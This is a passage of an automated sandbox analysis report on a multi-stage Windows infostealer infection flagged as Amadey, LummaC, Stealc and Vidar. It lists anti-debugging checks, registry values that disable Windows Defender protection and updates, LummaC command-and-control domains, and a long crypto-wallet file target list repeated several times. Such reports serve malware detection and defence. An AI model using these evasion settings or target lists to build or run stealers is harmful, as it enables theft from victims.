Source: C:\Users\user\DocumentsIIEBKJECFC.exe Code function: 9_2_0037652B mov eax, dword ptr fs:[00000030h] 9_2_0037652B
Source: C:\Users\user\DocumentsIIEBKJECFC.exe Code function: 9_2_0037A302 mov eax, dword ptr fs:[00000030h] 9_2_0037A302
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 10_2_00E4A302 mov eax, dword ptr fs:[00000030h] 10_2_00E4A302
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 10_2_00E4652B mov eax, dword ptr fs:[00000030h] 10_2_00E4652B
Enables debug privileges
Source: C:\Users\user\AppData\Local\Temp\1005815001\accd68d705.exe Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\70XXT0BM2TDFAKTXCB0ILV78JWN4.exe Process token adjusted: Debug
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C60B66C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 0_2_6C60B66C
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C60B1F7 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_6C60B1F7
Source: C:\Users\user\Desktop\file.exe Memory protected: page guard Jump to behavior

HIPS / PFW / Operating System Protection Evasion
barindex
Yara detected Powershell download and execute
Source: Yara match File source: Process Memory Space: file.exe PID: 7472, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: 82b4c5cad2.exe PID: 6208, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: 82b4c5cad2.exe PID: 2368, type: MEMORYSTR
LummaC encrypted strings found
Source: c3e1e78f6d.exe, 0000000D.00000002.2608781039.00000000006B1000.00000040.00000001.01000000.0000000F.sdmp String found in binary or memory: faintbl0w.sbs
Source: c3e1e78f6d.exe, 0000000D.00000002.2608781039.00000000006B1000.00000040.00000001.01000000.0000000F.sdmp String found in binary or memory: 300snails.sbs
Source: c3e1e78f6d.exe, 0000000D.00000002.2608781039.00000000006B1000.00000040.00000001.01000000.0000000F.sdmp String found in binary or memory: 3xc1aimbl0w.sbs
Source: c3e1e78f6d.exe, 0000000D.00000002.2608781039.00000000006B1000.00000040.00000001.01000000.0000000F.sdmp String found in binary or memory: thicktoys.sbs
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\DocumentsIIEBKJECFC.exe" Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\user\DocumentsIIEBKJECFC.exe "C:\Users\user\DocumentsIIEBKJECFC.exe" Jump to behavior
Source: C:\Users\user\DocumentsIIEBKJECFC.exe Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1005812001\c3e1e78f6d.exe "C:\Users\user\AppData\Local\Temp\1005812001\c3e1e78f6d.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1005813001\82b4c5cad2.exe "C:\Users\user\AppData\Local\Temp\1005813001\82b4c5cad2.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1005815001\accd68d705.exe "C:\Users\user\AppData\Local\Temp\1005815001\accd68d705.exe" Jump to behavior
Source: c3e1e78f6d.exe, 0000000D.00000002.2617086313.00000000008C7000.00000040.00000001.01000000.0000000F.sdmp, c3e1e78f6d.exe, 00000011.00000002.2739572348.00000000008C7000.00000040.00000001.01000000.0000000F.sdmp Binary or memory string: ,Program Manager
Source: file.exe, file.exe, 00000000.00000002.2162844185.0000000000B2C000.00000040.00000001.01000000.00000003.sdmp, accd68d705.exe, 00000012.00000002.2664002502.0000000000B5C000.00000040.00000001.01000000.00000011.sdmp, Q10LTOCEFP0KA6N46594D.exe, 00000016.00000002.2794697341.000000000082C000.00000040.00000001.01000000.00000015.sdmp Binary or memory string: Program Manager
Source: DocumentsIIEBKJECFC.exe, DocumentsIIEBKJECFC.exe, 00000009.00000002.2176448910.0000000000580000.00000040.00000001.01000000.0000000B.sdmp, skotes.exe, skotes.exe, 0000000A.00000002.2204182541.0000000001050000.00000040.00000001.01000000.0000000E.sdmp, skotes.exe, 0000000B.00000002.2208268351.0000000001050000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: QProgram Manager
Contains functionality to query CPU information (cpuid)
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C60B341 cpuid 0_2_6C60B341
Queries information about the installed CPU (vendor, model number etc)
Source: C:\Users\user\Desktop\file.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 Jump to behavior
Source: C:\Users\user\Desktop\file.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 Jump to behavior
Queries the volume information (name, serial number etc) of a device
Source: C:\Users\user\Desktop\file.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\file.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1005812001\c3e1e78f6d.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1005812001\c3e1e78f6d.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1005813001\82b4c5cad2.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1005813001\82b4c5cad2.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1005815001\accd68d705.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1005815001\accd68d705.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1005812001\c3e1e78f6d.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1005813001\82b4c5cad2.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1005812001\c3e1e78f6d.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1005813001\82b4c5cad2.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1005812001\c3e1e78f6d.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1005813001\82b4c5cad2.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5D35A0 ?Startup@TimeStamp@mozilla@@SAXXZ,InitializeCriticalSectionAndSpinCount,getenv,QueryPerformanceFrequency,_strnicmp,GetSystemTimeAdjustment,__aulldiv,QueryPerformanceCounter,EnterCriticalSection,LeaveCriticalSection,QueryPerformanceCounter,EnterCriticalSection,LeaveCriticalSection,__aulldiv,strcmp,strcmp,_strnicmp, 0_2_6C5D35A0
Source: C:\Users\user\AppData\Local\Temp\1005812001\c3e1e78f6d.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Lowering of HIPS / PFW / Operating System Security Settings
barindex
Disable Windows Defender notifications (registry)
Source: C:\Users\user\AppData\Local\Temp\1005815001\accd68d705.exe Registry key value created / modified: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications DisableNotifications 1
Disable Windows Defender real time protection (registry)
Source: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection Registry value created: DisableIOAVProtection 1
Source: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection Registry value created: DisableRealtimeMonitoring 1
Source: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications Registry value created: DisableNotifications 1
Disables Windows Defender Tamper protection
Source: C:\Users\user\AppData\Local\Temp\1005815001\accd68d705.exe Registry value created: TamperProtection 0
Modifies windows update settings
Source: C:\Users\user\AppData\Local\Temp\1005815001\accd68d705.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU AUOptions
Source: C:\Users\user\AppData\Local\Temp\1005815001\accd68d705.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU AutoInstallMinorUpdates
Source: C:\Users\user\AppData\Local\Temp\1005815001\accd68d705.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate DoNotConnectToWindowsUpdateInternetLocations
AV process strings found (often used to terminate AV products)
Source: c3e1e78f6d.exe, 0000000D.00000003.2485828191.0000000001534000.00000004.00000020.00020000.00000000.sdmp, c3e1e78f6d.exe, 00000011.00000003.2728217584.0000000001001000.00000004.00000020.00020000.00000000.sdmp, c3e1e78f6d.exe, 00000011.00000002.2742683237.0000000001003000.00000004.00000020.00020000.00000000.sdmp, c3e1e78f6d.exe, 00000017.00000003.3023444353.0000000000E74000.00000004.00000020.00020000.00000000.sdmp, c3e1e78f6d.exe, 00000017.00000003.3024056962.0000000000E77000.00000004.00000020.00020000.00000000.sdmp, c3e1e78f6d.exe, 00000017.00000003.2902319838.0000000000E77000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Source: C:\Users\user\AppData\Local\Temp\1005812001\c3e1e78f6d.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Source: C:\Users\user\AppData\Local\Temp\1005812001\c3e1e78f6d.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Source: C:\Users\user\AppData\Local\Temp\1005812001\c3e1e78f6d.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

Stealing of Sensitive Information
barindex
Yara detected Amadeys stealer DLL
Source: Yara match File source: 9.2.DocumentsIIEBKJECFC.exe.340000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.skotes.exe.e10000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.skotes.exe.e10000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000B.00000002.2207719562.0000000000E11000.00000040.00000001.01000000.0000000E.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.2203663551.0000000000E11000.00000040.00000001.01000000.0000000E.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.2175361575.0000000000341000.00000040.00000001.01000000.0000000B.sdmp, type: MEMORY
Yara detected LummaC Stealer
Source: Yara match File source: decrypted.memstr, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: c3e1e78f6d.exe PID: 7944, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: c3e1e78f6d.exe PID: 6956, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: c3e1e78f6d.exe PID: 7236, type: MEMORYSTR
Source: Yara match File source: 13.2.c3e1e78f6d.exe.6b0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.c3e1e78f6d.exe.6b0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: sslproxydump.pcap, type: PCAP
Yara detected Stealc
Source: Yara match File source: 00000000.00000002.2164783980.0000000000F9E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000018.00000003.2857025061.0000000005910000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000003.2609138087.0000000005010000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.2160637336.0000000000751000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: 00000018.00000002.2897720480.0000000000F71000.00000040.00000001.01000000.00000010.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000002.2670475440.0000000000F71000.00000040.00000001.01000000.00000010.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.2486797329.00000000017DE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.2485790355.0000000000F71000.00000040.00000001.01000000.00000010.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000003.2444697974.0000000005190000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000002.2669591001.0000000000C16000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.1838467283.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000018.00000002.2899998365.0000000001C32000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: file.exe PID: 7472, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: 82b4c5cad2.exe PID: 6208, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: 82b4c5cad2.exe PID: 2368, type: MEMORYSTR
Source: Yara match File source: dump.pcap, type: PCAP
Yara detected Vidar stealer
Source: Yara match File source: Process Memory Space: file.exe PID: 7472, type: MEMORYSTR
Found many strings related to Crypto-Wallets (likely being stolen)
Source: file.exe, 00000000.00000002.2164783980.0000000001011000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: file.exe, 00000000.00000002.2164783980.0000000001011000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: file.exe, 00000000.00000002.2164783980.0000000001011000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: file.exe, 00000000.00000002.2164783980.0000000001011000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: file.exe, 00000000.00000002.2164783980.0000000001011000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: file.exe, 00000000.00000002.2164783980.0000000001011000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: file.exe, 00000000.00000002.2164783980.0000000001011000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: \S-1-5-21-2246122658-3693405117-2476756634-1002.wallet\info.seco*(
